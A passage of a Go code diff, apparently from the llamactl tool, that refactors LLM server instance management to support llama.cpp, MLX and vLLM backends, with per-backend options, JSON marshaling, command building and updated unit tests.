log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, maxRestarts)
maxRestarts = 0
}
optionsCopy.MaxRestarts = &maxRestarts
}
if options.RestartDelay != nil {
restartDelay := *options.RestartDelay
if restartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, restartDelay)
restartDelay = 0
}
optionsCopy.RestartDelay = &restartDelay
}
if options.OnDemandStart != nil {
onDemandStart := *options.OnDemandStart
optionsCopy.OnDemandStart = &onDemandStart
}
if options.IdleTimeout != nil {
idleTimeout := *options.IdleTimeout
if idleTimeout < 0 {
log.Printf("Instance %s IdleTimeout value (%d) cannot be negative, setting to 0 minutes", name, idleTimeout)
idleTimeout = 0
}
optionsCopy.IdleTimeout = &idleTimeout
}
}
return optionsCopy
}
// applyDefaultOptions applies default values from global settings to any nil options
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *config.InstancesConfig) {
if globalSettings == nil {
return
}
if options.AutoRestart == nil {
defaultAutoRestart := globalSettings.DefaultAutoRestart
options.AutoRestart = &defaultAutoRestart
}
if options.MaxRestarts == nil {
defaultMaxRestarts := globalSettings.DefaultMaxRestarts
options.MaxRestarts = &defaultMaxRestarts
}
if options.RestartDelay == nil {
defaultRestartDelay := globalSettings.DefaultRestartDelay
options.RestartDelay = &defaultRestartDelay
}
if options.OnDemandStart == nil {
defaultOnDemandStart := globalSettings.DefaultOnDemandStart
options.OnDemandStart = &defaultOnDemandStart
}
if options.IdleTimeout == nil {
defaultIdleTimeout := 0
options.IdleTimeout = &defaultIdleTimeout
}
}
// NewInstance creates a new instance with the given name, log path, and options
func NewInstance(name string, globalBackendSettings *config.BackendConfig, globalInstanceSettings *config.InstancesConfig, options *CreateInstanceOptions, onStatusChange func(oldStatus, newStatus InstanceStatus)) *Process {
// Validate and copy options
options.ValidateAndApplyDefaults(name, globalInstanceSettings)
// Create the instance logger
logger := NewInstanceLogger(name, globalInstanceSettings.LogsDir)
return &Process{
Name: name,
options: options,
globalInstanceSettings: globalInstanceSettings,
globalBackendSettings: globalBackendSettings,
logger: logger,
timeProvider: realTimeProvider{},
Created: time.Now().Unix(),
Status: Stopped,
onStatusChange: onStatusChange,
}
}
@@ -217,6 +92,50 @@ func (i *Process) GetOptions() *CreateInstanceOptions {
return i.options
}
func (i *Process) GetPort() int {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
return i.options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
return i.options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
return i.options.VllmServerOptions.Port
}
}
}
return 0
}
func (i *Process) GetHost() string {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
return i.options.LlamaServerOptions.Host
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
return i.options.MlxServerOptions.Host
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
return i.options.VllmServerOptions.Host
}
}
}
return ""
}
func (i *Process) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock()
defer i.mu.Unlock()
@@ -226,11 +145,10 @@ func (i *Process) SetOptions(options *CreateInstanceOptions) {
return
}
// Validate and copy options
options.ValidateAndApplyDefaults(i.Name, i.globalInstanceSettings)
i.options = options
// Clear the proxy so it gets recreated with new options
i.proxy = nil
}
@@ -253,7 +171,27 @@ func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
return nil, fmt.Errorf("instance %s has no options set", i.Name)
}
var host string
var port int
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
host = i.options.LlamaServerOptions.Host
port = i.options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
host = i.options.MlxServerOptions.Host
port = i.options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
host = i.options.VllmServerOptions.Host
port = i.options.VllmServerOptions.Port
}
}
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
if err != nil {
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
}
@@ -283,44 +221,55 @@ func (i *Process) MarshalJSON() ([]byte, error) {
i.mu.RLock()
defer i.mu.RUnlock()
// Determine if docker is enabled for this instance's backend
var dockerEnabled bool
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.globalBackendSettings != nil && i.globalBackendSettings.LlamaCpp.Docker != nil && i.globalBackendSettings.LlamaCpp.Docker.Enabled {
dockerEnabled = true
}
case backends.BackendTypeVllm:
if i.globalBackendSettings != nil && i.globalBackendSettings.VLLM.Docker != nil && i.globalBackendSettings.VLLM.Docker.Enabled {
dockerEnabled = true
}
case backends.BackendTypeMlxLm:
// MLX does not support docker currently
}
}
// Use anonymous struct to avoid recursion
type Alias Process
return json.Marshal(&struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"`
DockerEnabled bool `json:"docker_enabled,omitempty"`
}{
Alias: (*Alias)(i),
Options: i.options,
DockerEnabled: dockerEnabled,
})
}
// UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Process) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias Process
aux := &struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"`
}{
Alias: (*Alias)(i),
}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Handle options with validation and defaults
if aux.Options != nil {
aux.Options.ValidateAndApplyDefaults(i.Name, i.globalInstanceSettings)
i.options = aux.Options
}
return nil


@@ -2,6 +2,7 @@ package instance_test
import (
"encoding/json"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
@@ -10,6 +11,21 @@ import (
)
func TestNewInstance(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
@@ -18,28 +34,32 @@ func TestNewInstance(t *testing.T) {
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := instance.NewInstance("test-instance", globalSettings, options)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
}
if inst.IsRunning() {
t.Error("New instance should not be running")
}
// Check that options were properly set with defaults applied
opts := inst.GetOptions()
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
// Check that defaults were applied
@@ -55,6 +75,21 @@ func TestNewInstance(t *testing.T) {
}
func TestNewInstance_WithRestartOptions(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
@@ -71,12 +106,16 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := instance.NewInstance("test-instance", globalSettings, options)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions()
// Check that explicit values override defaults
@@ -92,6 +131,21 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
}
func TestSetOptions(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
@@ -100,17 +154,22 @@ func TestSetOptions(t *testing.T) {
}
initialOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst := instance.NewInstance("test-instance", globalSettings, initialOptions)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, initialOptions, mockOnStatusChange)
// Update options
newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
@@ -119,11 +178,11 @@ func TestSetOptions(t *testing.T) {
inst.SetOptions(newOptions)
opts := inst.GetOptions()
if opts.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model)
if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if opts.Port != 8081 {
t.Errorf("Expected updated port 8081, got %d", opts.Port)
if inst.GetPort() != 8081 {
t.Errorf("Expected updated port 8081, got %d", inst.GetPort())
}
// Check that defaults are still applied
@@ -133,18 +192,37 @@ func TestSetOptions(t *testing.T) {
}
func TestGetProxy(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Host: "localhost",
Port: 8080,
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Get proxy for the first time
proxy1, err := inst.GetProxy()
@@ -166,6 +244,21 @@ func TestGetProxy(t *testing.T) {
}
func TestMarshalJSON(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
@@ -174,13 +267,17 @@ func TestMarshalJSON(t *testing.T) {
}
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := instance.NewInstance("test-instance", globalSettings, options)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
data, err := json.Marshal(instance)
if err != nil {
@@ -188,7 +285,7 @@ func TestMarshalJSON(t *testing.T) {
}
// Check that JSON contains expected fields
var result map[string]interface{}
var result map[string]any
err = json.Unmarshal(data, &result)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
@@ -197,8 +294,8 @@ func TestMarshalJSON(t *testing.T) {
if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"])
}
if result["running"] != false {
t.Errorf("Expected running false, got %v", result["running"])
if result["status"] != "stopped" {
t.Errorf("Expected status 'stopped', got %v", result["status"])
}
// Check that options are included
@@ -210,20 +307,41 @@ func TestMarshalJSON(t *testing.T) {
if !ok {
t.Error("Expected options to be a map")
}
if options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", options_map["model"])
// Check backend type
if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) {
t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"])
}
// Check backend options
backend_options_data, ok := options_map["backend_options"]
if !ok {
t.Error("Expected backend_options to be included in JSON")
}
backend_options_map, ok := backend_options_data.(map[string]any)
if !ok {
t.Error("Expected backend_options to be a map")
}
if backend_options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"])
}
if backend_options_map["port"] != float64(8080) {
t.Errorf("Expected port 8080, got %v", backend_options_map["port"])
}
}
func TestUnmarshalJSON(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": true,
"status": "running",
"options": {
"model": "/path/to/model.gguf",
"port": 8080,
"auto_restart": false,
"max_restarts": 5
"max_restarts": 5,
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"port": 8080
}
}
}`
@@ -236,19 +354,25 @@ func TestUnmarshalJSON(t *testing.T) {
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
}
if !inst.Running {
t.Error("Expected running to be true")
if !inst.IsRunning() {
t.Error("Expected status to be running")
}
opts := inst.GetOptions()
if opts == nil {
t.Fatal("Expected options to be set")
}
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
if opts.BackendType != backends.BackendTypeLlamaCpp {
t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
if opts.LlamaServerOptions == nil {
t.Fatal("Expected LlamaServerOptions to be set")
}
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false")
@@ -289,6 +413,21 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
},
}
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
@@ -298,12 +437,16 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
options := &instance.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := instance.NewInstance("test", globalSettings, options)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test", backendConfig, globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions()
if opts.MaxRestarts == nil {


@@ -5,10 +5,14 @@ import (
"fmt"
"log"
"net/http"
"os"
"os/exec"
"runtime"
"syscall"
"time"
"llamactl/pkg/backends"
"llamactl/pkg/config"
)
// Start starts the llama server instance and returns an error if it fails.
@@ -16,7 +20,7 @@ func (i *Process) Start() error {
i.mu.Lock()
defer i.mu.Unlock()
if i.Running {
if i.IsRunning() {
return fmt.Errorf("instance %s is already running", i.Name)
}
@@ -34,15 +38,20 @@ func (i *Process) Start() error {
// Initialize last request time to current time when starting
i.lastRequestTime.Store(i.timeProvider.Now().Unix())
// Create context before building command (needed for CommandContext)
i.ctx, i.cancel = context.WithCancel(context.Background())
// Create log files
if err := i.logger.Create(); err != nil {
return fmt.Errorf("failed to create log files: %w", err)
}
args := i.options.BuildCommandArgs()
i.ctx, i.cancel = context.WithCancel(context.Background())
i.cmd = exec.CommandContext(i.ctx, "llama-server", args...)
// Build command using backend-specific methods
cmd, cmdErr := i.buildCommand()
if cmdErr != nil {
return fmt.Errorf("failed to build command: %w", cmdErr)
}
i.cmd = cmd
if runtime.GOOS != "windows" {
setProcAttrs(i.cmd)
@@ -65,7 +74,7 @@ func (i *Process) Start() error {
return fmt.Errorf("failed to start instance %s: %w", i.Name, err)
}
i.Running = true
i.SetStatus(Running)
// Create channel for monitor completion signaling
i.monitorDone = make(chan struct{})
@@ -82,7 +91,7 @@ func (i *Process) Start() error {
func (i *Process) Stop() error {
i.mu.Lock()
if !i.Running {
if !i.IsRunning() {
// Even if not running, cancel any pending restart
if i.restartCancel != nil {
i.restartCancel()
@@ -99,8 +108,8 @@ func (i *Process) Stop() error {
i.restartCancel = nil
}
// Set running to false first to signal intentional stop
i.Running = false
// Set status to stopped first to signal intentional stop
i.SetStatus(Stopped)
// Clean up the proxy
i.proxy = nil
@@ -110,19 +119,25 @@ func (i *Process) Stop() error {
i.mu.Unlock()
// Stop the process with SIGINT
if i.cmd.Process != nil {
// Stop the process with SIGINT if cmd exists
if i.cmd != nil && i.cmd.Process != nil {
if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil {
log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err)
}
}
// If no process exists, we can return immediately
if i.cmd == nil || monitorDone == nil {
i.logger.Close()
return nil
}
select {
case <-monitorDone:
// Process exited normally
case <-time.After(30 * time.Second):
// Force kill if it doesn't exit within 30 seconds
if i.cmd.Process != nil {
if i.cmd != nil && i.cmd.Process != nil {
killErr := i.cmd.Process.Kill()
if killErr != nil {
log.Printf("Failed to force kill instance %s: %v", i.Name, killErr)
@@ -144,8 +159,12 @@ func (i *Process) Stop() error {
return nil
}
func (i *Process) LastRequestTime() int64 {
return i.lastRequestTime.Load()
}
func (i *Process) WaitForHealthy(timeout int) error {
if !i.Running {
if !i.IsRunning() {
return fmt.Errorf("instance %s is not running", i.Name)
}
@@ -163,11 +182,29 @@ func (i *Process) WaitForHealthy(timeout int) error {
}
// Build the health check URL directly
host := opts.Host
var host string
var port int
switch opts.BackendType {
case backends.BackendTypeLlamaCpp:
if opts.LlamaServerOptions != nil {
host = opts.LlamaServerOptions.Host
port = opts.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if opts.MlxServerOptions != nil {
host = opts.MlxServerOptions.Host
port = opts.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if opts.VllmServerOptions != nil {
host = opts.VllmServerOptions.Host
port = opts.VllmServerOptions.Port
}
}
if host == "" {
host = "localhost"
}
healthURL := fmt.Sprintf("http://%s:%d/health", host, opts.Port)
healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
// Create a dedicated HTTP client for health checks
client := &http.Client{
@@ -227,12 +264,12 @@ func (i *Process) monitorProcess() {
i.mu.Lock()
// Check if the instance was intentionally stopped
if !i.Running {
if !i.IsRunning() {
i.mu.Unlock()
return
}
i.Running = false
i.SetStatus(Stopped)
i.logger.Close()
// Cancel any existing restart context since we're handling a new exit
@@ -257,6 +294,7 @@ func (i *Process) handleRestart() {
// Validate restart conditions and get safe parameters
shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
if !shouldRestart {
i.SetStatus(Failed)
i.mu.Unlock()
return
}
@@ -327,3 +365,53 @@ func (i *Process) validateRestartConditions() (shouldRestart bool, maxRestarts i
return true, maxRestarts, restartDelay
}
// buildCommand builds the command to execute using backend-specific logic
func (i *Process) buildCommand() (*exec.Cmd, error) {
// Get backend configuration
backendConfig, err := i.getBackendConfig()
if err != nil {
return nil, err
}
// Build the environment variables
env := i.options.BuildEnvironment(backendConfig)
// Get the command to execute
command := i.options.GetCommand(backendConfig)
// Build command arguments
args := i.options.BuildCommandArgs(backendConfig)
// Create the exec.Cmd
cmd := exec.CommandContext(i.ctx, command, args...)
// Start with host environment variables
cmd.Env = os.Environ()
// Add/override with backend-specific environment variables
for k, v := range env {
cmd.Env = append(cmd.Env, fmt.Sprintf("%s=%s", k, v))
}
return cmd, nil
}
// getBackendConfig resolves the backend configuration for the current instance
func (i *Process) getBackendConfig() (*config.BackendSettings, error) {
var backendTypeStr string
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
backendTypeStr = "llama-cpp"
case backends.BackendTypeMlxLm:
backendTypeStr = "mlx"
case backends.BackendTypeVllm:
backendTypeStr = "vllm"
default:
return nil, fmt.Errorf("unsupported backend type: %s", i.options.BackendType)
}
settings := i.globalBackendSettings.GetBackendSettings(backendTypeStr)
return &settings, nil
}
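The string keys used in getBackendConfig are presumably the same keys that GetBackendSettings uses to pick the typed per-backend settings off config.BackendConfig; that mapping is not shown in this diff, so the sketch below only records the assumption:

package main

import "llamactl/pkg/config"

func main() {
	// Assumed mapping (not part of this diff): GetBackendSettings resolves the
	// typed settings struct on BackendConfig from the same keys used in the switch above.
	var cfg config.BackendConfig
	_ = cfg.GetBackendSettings("llama-cpp") // expected to return cfg.LlamaCpp
	_ = cfg.GetBackendSettings("mlx")       // expected to return cfg.MLX
	_ = cfg.GetBackendSettings("vllm")      // expected to return cfg.VLLM
}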

pkg/instance/options.go (new file, 265 lines added)

@@ -0,0 +1,265 @@
package instance
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/backends/mlx"
"llamactl/pkg/backends/vllm"
"llamactl/pkg/config"
"log"
"maps"
)
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"` // seconds
// On demand start
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes
// Environment variables
Environment map[string]string `json:"environment,omitempty"`
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
// Backend-specific options
LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
MlxServerOptions *mlx.MlxServerOptions `json:"-"`
VllmServerOptions *vllm.VllmServerOptions `json:"-"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := &struct {
*Alias
}{
Alias: (*Alias)(c),
}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Parse backend-specific options
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.BackendOptions != nil {
// Convert map to JSON and then unmarshal to LlamaServerOptions
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
}
}
case backends.BackendTypeMlxLm:
if c.BackendOptions != nil {
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.MlxServerOptions = &mlx.MlxServerOptions{}
if err := json.Unmarshal(optionsData, c.MlxServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal MLX options: %w", err)
}
}
case backends.BackendTypeVllm:
if c.BackendOptions != nil {
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.VllmServerOptions = &vllm.VllmServerOptions{}
if err := json.Unmarshal(optionsData, c.VllmServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal vLLM options: %w", err)
}
}
default:
return fmt.Errorf("unknown backend type: %s", c.BackendType)
}
return nil
}
// MarshalJSON implements custom JSON marshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) MarshalJSON() ([]byte, error) {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := struct {
*Alias
}{
Alias: (*Alias)(c),
}
// Convert backend-specific options back to BackendOptions map for JSON
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
data, err := json.Marshal(c.LlamaServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal llama server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
case backends.BackendTypeMlxLm:
if c.MlxServerOptions != nil {
data, err := json.Marshal(c.MlxServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal MLX server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
case backends.BackendTypeVllm:
if c.VllmServerOptions != nil {
data, err := json.Marshal(c.VllmServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal vLLM server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
}
return json.Marshal(aux)
}
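For reference, a minimal sketch of the wire format these two methods round-trip; the JSON keys match the test fixture later in this changeset, and error handling is trimmed for brevity:

package main

import (
	"encoding/json"
	"fmt"

	"llamactl/pkg/instance"
)

func main() {
	// backend_options travels as a plain JSON map and is re-hydrated into the
	// typed LlamaServerOptions by the custom UnmarshalJSON above.
	raw := []byte(`{
		"backend_type": "llama_cpp",
		"backend_options": {"model": "/path/to/model.gguf", "port": 8080}
	}`)

	var opts instance.CreateInstanceOptions
	if err := json.Unmarshal(raw, &opts); err != nil {
		panic(err)
	}
	fmt.Println(opts.LlamaServerOptions.Model) // "/path/to/model.gguf"

	// MarshalJSON goes the other way: the typed struct is flattened back into
	// the backend_options map before encoding.
	out, _ := json.Marshal(&opts)
	fmt.Println(string(out))
}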
// ValidateAndApplyDefaults validates the instance options and applies constraints
func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
// Validate and apply constraints
if c.MaxRestarts != nil && *c.MaxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, *c.MaxRestarts)
*c.MaxRestarts = 0
}
if c.RestartDelay != nil && *c.RestartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, *c.RestartDelay)
*c.RestartDelay = 0
}
if c.IdleTimeout != nil && *c.IdleTimeout < 0 {
log.Printf("Instance %s IdleTimeout value (%d) cannot be negative, setting to 0 minutes", name, *c.IdleTimeout)
*c.IdleTimeout = 0
}
// Apply defaults from global settings for nil fields
if globalSettings != nil {
if c.AutoRestart == nil {
c.AutoRestart = &globalSettings.DefaultAutoRestart
}
if c.MaxRestarts == nil {
c.MaxRestarts = &globalSettings.DefaultMaxRestarts
}
if c.RestartDelay == nil {
c.RestartDelay = &globalSettings.DefaultRestartDelay
}
if c.OnDemandStart == nil {
c.OnDemandStart = &globalSettings.DefaultOnDemandStart
}
if c.IdleTimeout == nil {
defaultIdleTimeout := 0
c.IdleTimeout = &defaultIdleTimeout
}
}
}
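A small usage sketch of what this gives (values illustrative): negative values are clamped to zero, and only nil fields inherit the global defaults.

package main

import (
	"fmt"

	"llamactl/pkg/config"
	"llamactl/pkg/instance"
)

func main() {
	globals := &config.InstancesConfig{
		DefaultAutoRestart:  true,
		DefaultMaxRestarts:  3,
		DefaultRestartDelay: 5,
	}

	negative := -1
	opts := &instance.CreateInstanceOptions{MaxRestarts: &negative}
	opts.ValidateAndApplyDefaults("example", globals)

	fmt.Println(*opts.MaxRestarts)  // 0 (clamped; the explicit value is kept, not replaced by the default 3)
	fmt.Println(*opts.AutoRestart)  // true, inherited from globals
	fmt.Println(*opts.RestartDelay) // 5, inherited from globals
	fmt.Println(*opts.IdleTimeout)  // 0, the fallback when no idle timeout is set
}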
func (c *CreateInstanceOptions) GetCommand(backendConfig *config.BackendSettings) string {
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
return "docker"
}
return backendConfig.Command
}
// BuildCommandArgs builds command line arguments for the backend
func (c *CreateInstanceOptions) BuildCommandArgs(backendConfig *config.BackendSettings) []string {
